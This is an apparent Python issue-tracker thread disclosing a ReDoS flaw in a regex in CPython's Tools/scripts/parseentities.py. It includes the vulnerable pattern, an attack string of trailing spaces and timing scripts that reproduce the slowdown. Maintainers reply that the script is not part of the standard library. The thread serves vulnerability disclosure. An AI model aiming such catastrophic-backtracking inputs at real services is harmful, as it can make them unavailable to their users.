
classification
Title: REDoS in parseentities
Type:
Stage:
Components: Demos and Tools
Versions: Python 3.11, Python 3.10, Python 3.9
process
Status: open
Resolution:
Dependencies:
Superseder:
Assigned To:
Nosy List: lemburg, pablogsal, serhiy.storchaka, yetingli
Priority: normal
Keywords:

Created on 2020-10-03 15:12 by yetingli, last changed 2022-04-11 14:59 by admin.

Messages (3)
msg377885 - Author: yeting li (yetingli) Date: 2020-10-03 15:12
Hi,

I found that the regex '<!ENTITY +(\w+) +CDATA +"([^"]+)" +-- +((?:.|\n)+?) *-->' can get stuck on certain input.
The vulnerable regex is located in
https://github.com/python/cpython/blob/8d21aa21f2cbc6d50aab3f420bb23be1d081dac4/Tools/scripts/parseentities.py#L18

The ReDoS vulnerability of the regex is mainly due to the sub-pattern ' +((?:.|\n)+?) *'
and can be exploited with the following string:
'<!ENTITY a CDATA "a" -- ' + ' ' * 5000

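You can run the following code to reproduce the ReDoS:

# Assumes the root of a CPython source checkout is on sys.path,
# so that Tools/scripts/parseentities.py is importable.
from Tools.scripts.parseentities import parse
from time import perf_counter

for i in range(0, 10000):
    # Valid entity prefix followed by a growing run of spaces and no closing '-->'.
    ATTACK = '<!ENTITY a CDATA "a" -- ' + ' ' * i * 100
    LEN = len(ATTACK)
    BEGIN = perf_counter()
    parse(ATTACK)
    DURATION = perf_counter() - BEGIN
    print(f"{LEN}: took {DURATION} seconds!")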

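For anyone without a CPython checkout at hand, the same behaviour can be sketched without importing the tool. This is only a minimal sketch: the pattern is copied from the report above, while the names ENTITY_RE, PREFIX and time_attack are made up for illustration and are not part of parseentities.py. The input sizes are kept small on purpose so the loop finishes quickly.

```python
import re
from time import perf_counter

# Pattern copied verbatim from the report; ENTITY_RE is an illustrative name.
ENTITY_RE = re.compile(r'<!ENTITY +(\w+) +CDATA +"([^"]+)" +-- +((?:.|\n)+?) *-->')

# Valid start of an entity declaration; the closing '-->' is never supplied.
PREFIX = '<!ENTITY a CDATA "a" -- '


def time_attack(n_spaces):
    """Return (match, seconds) for a search over PREFIX plus n_spaces spaces."""
    text = PREFIX + ' ' * n_spaces
    begin = perf_counter()
    match = ENTITY_RE.search(text)
    return match, perf_counter() - begin


if __name__ == "__main__":
    # Hypothetical sizes, chosen small; larger runs of spaces take much longer.
    for n in (50, 100, 200):
        match, seconds = time_attack(n)
        print(f"{n} spaces: match={match}, took {seconds:.4f} seconds")
```

The search never finds a match because the closing '-->' is missing, so the time is spent entirely on backtracking through the ways ' +', '(?:.|\n)+?' and ' *' can split the run of spaces.
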
Looking forward to your response!

Best,
Yeting Li
msg378011 - Author: Pablo Galindo Salgado (pablogsal) (Python committer) Date: 2020-10-05 09:47
Without evaluating the validity of the regex vulnerability, it is important to note that the files in Tools/scripts are not part of the standard library and therefore are not a valid attack vector.
msg407783 - Author: Marc-Andre Lemburg (lemburg) (Python committer) Date: 2021-12-06 10:24
Interesting that the tool still exists. It uses mxTextTools, but in a non-packaged version, so it's been broken for two decades now :-)

I think it's safe to remove it from Tools\scripts.
History
Date User Action Args
2022-04-11 14:59:36 admin set github: 86087
2021-12-06 10:24:39 lemburg set messages: + msg407783
2021-12-06 10:10:58 iritkatriel set nosy: + lemburg; versions: + Python 3.11, - Python 3.5, Python 3.6, Python 3.7, Python 3.8
2020-10-05 09:47:51 pablogsal set nosy: + pablogsal; messages: + msg378011
2020-10-03 16:37:11 serhiy.storchaka set nosy: + serhiy.storchaka
2020-10-03 15:12:49 yetingli create